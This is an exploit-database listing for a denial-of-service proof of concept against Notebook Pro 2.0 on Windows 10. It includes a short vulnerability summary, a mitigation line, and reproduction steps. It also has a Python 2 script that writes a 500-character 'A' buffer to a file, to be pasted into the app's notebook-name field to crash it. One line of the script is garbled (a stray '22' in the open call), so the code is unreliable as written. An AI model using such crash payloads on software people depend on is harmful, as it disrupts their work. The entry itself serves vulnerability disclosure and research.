header-logo
Suggest Exploit
vendor:
Notebook Pro
by:
Ali Alipour
7.5
CVSS
HIGH
Denial of Service
20
CWE
Product Name: Notebook Pro
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:stokedonit:notebook_pro
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2018

Notebook Pro 2.0 – Denial Of Service (PoC)

A buffer overflow vulnerability exists in Notebook Pro 2.0, which could allow an attacker to cause a denial of service condition. The vulnerability is due to insufficient input validation when handling user-supplied data. An attacker can exploit this vulnerability by supplying a specially crafted payload to the application. This will cause the application to crash, resulting in a denial of service condition.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of Notebook Pro 2.0.
Source

Exploit-DB raw data:

# Exploit Title : Notebook Pro 2.0 - Denial Of Service (PoC)
# Exploit Author : Ali Alipour
# WebSite : http://Alipour.it
# Date: 2018-09-14
# Vendor Homepage : http://www.stokedonit.com/apps/notebook-pro/
# Software Link Download : https://www.microsoft.com/store/apps/9WZDNCRDMC76
# Tested on : Windows 10 - 64-bit

# Steps to Reproduce
# Run the python exploit script, it will create a new 
# file with the name "Notebook.txt" just copy the text inside "Notebook.txt"
# and start the Notebook Pro 2.0 - In Microsoft Windows 10 . 
# In The New Window Click On " New " And Click On notebook Button ( Create a New NoteBook ) .
# Now Paste The Content Of "Notebook.txt" Into The Field: " New NoteBook Name ". 
# Click "Create & Save" And You Will See a [ Boom !!!! ] - Notebook Pro 2.0 - In Microsoft Windows 10 [ Crash ].

#!/usr/bin/python
    
buffer = "A" * 500
payload = buffer
try:
    f=open("Notebook.txt",22"w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

Navigation

Suggest Exploit

Services By CQR